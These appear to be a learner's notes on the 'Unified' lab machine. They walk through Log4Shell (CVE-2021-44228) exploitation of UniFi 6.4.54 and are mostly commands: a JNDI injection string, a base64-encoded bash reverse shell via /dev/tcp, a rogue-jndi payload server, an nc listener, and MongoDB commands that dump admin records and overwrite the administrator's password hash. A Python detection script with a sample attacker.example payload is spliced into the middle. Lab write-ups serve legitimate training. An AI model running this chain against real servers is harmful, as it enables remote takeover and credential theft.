Unified
#Linux
#Web
#CVE
nmap -sC -sV -v <target_ip>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
8443/tcp open ssl/nagios-nsca Nagios NSCA
UniFi 6.4.54 exploit
article discusses CVE-2021-44228
next step: exploit the login page with Burp Suite
edit the JSON field remember in the request
(why?) with "${jndi:ldap://{Tun0 IP Address}/whatever}"
(how?)
JNDI
is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
LDAP
is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over the Internet or a network. The default port that LDAP runs on is port 389.
because the server sends a response, the system is vulnerable
try analysing the packets
sudo tcpdump -i tun0 port 389
shows the target trying to connect back to us, which means the system is vulnerable
next, build the payload to send to the target application
# requirements for running Java applications
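From the detection side, an added example (not part of the original notes): a small scanner that flags the JNDI lookup string described above in request bodies, URL-decoding first, and pulls out the callback host and port so a SOC can block it or correlate it with the outbound LDAP traffic seen in the tcpdump check. The sample requests, endpoint paths and hosts are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request log entries (not from the original notes): the
# UniFi login endpoint takes a JSON body, and the lookup goes in "remember".
SAMPLE_REQUESTS = [
    ("POST /api/login",
     '{"username":"admin","password":"x","remember":"${jndi:ldap://10.10.14.5:1389/o=tomcat}"}'),
    ("POST /api/login",
     '{"username":"admin","password":"x","remember":true}'),
    # URL-encoded form of ${jndi:rmi://attacker.example/a}
    ("GET /manage", "hdr=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D"),
]

# Matches ${jndi:<scheme>://<host>[:<port>]...}; case-insensitive because the
# Log4j lookup itself is.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|https?)"
    r"\s*:\s*//\s*(?P<host>[^/:\s}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def find_jndi_lookups(text):
    """Return (scheme, host, port) for every JNDI lookup in text.

    The text is URL-decoded first so encoded bodies are not missed.
    """
    hits = []
    for m in JNDI_RE.finditer(unquote(text)):
        port = int(m.group("port")) if m.group("port") else None
        hits.append((m.group("scheme").lower(), m.group("host"), port))
    return hits


def scan_requests(requests):
    """One alert per lookup found, carrying the callback host/port so it can
    be blocked at egress or correlated with outbound LDAP/RMI connections."""
    alerts = []
    for path, body in requests:
        for scheme, host, port in find_jndi_lookups(body):
            alerts.append({"path": path, "scheme": scheme,
                           "host": host, "port": port})
    return alerts


if __name__ == "__main__":
    for a in scan_requests(SAMPLE_REQUESTS):
        print("JNDI lookup in %(path)s -> %(scheme)s://%(host)s:%(port)s" % a)
```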
sudo apt update
sudo apt install openjdk-11-jdk
sudo apt install maven
# requirements for the rogue LDAP server application
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi/target/RogueJndi-1.1.jar
create the payload in base64 so there are no encoding issues
echo 'bash -c bash -i >& /dev/tcp/{Your IP Address}/{A port of your choice} 0>&1' | base64
e.g. port 4444
run Rogue-JNDI
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<BASE64 STRING HERE>}|{base64,-d}|{bash,-i}" --hostname "<your_ip>"
start a listener
nc -lvp 4444
# or
nc -nlvp 4444
# don't forget to allow port 4444 through the firewall
back in Burp Suite, change the request to
${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}
back at the listener
script /dev/null -c bash
obtained a user
, then look for privileges
check MongoDB
which may yield credentials
ps aux | grep mongo
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" | more
change the administrator's password hash
mkpasswd -m sha-512 Password1234
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})'
check again if needed
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" | more
log in to the website and find Settings -> Site
SSH authentication setting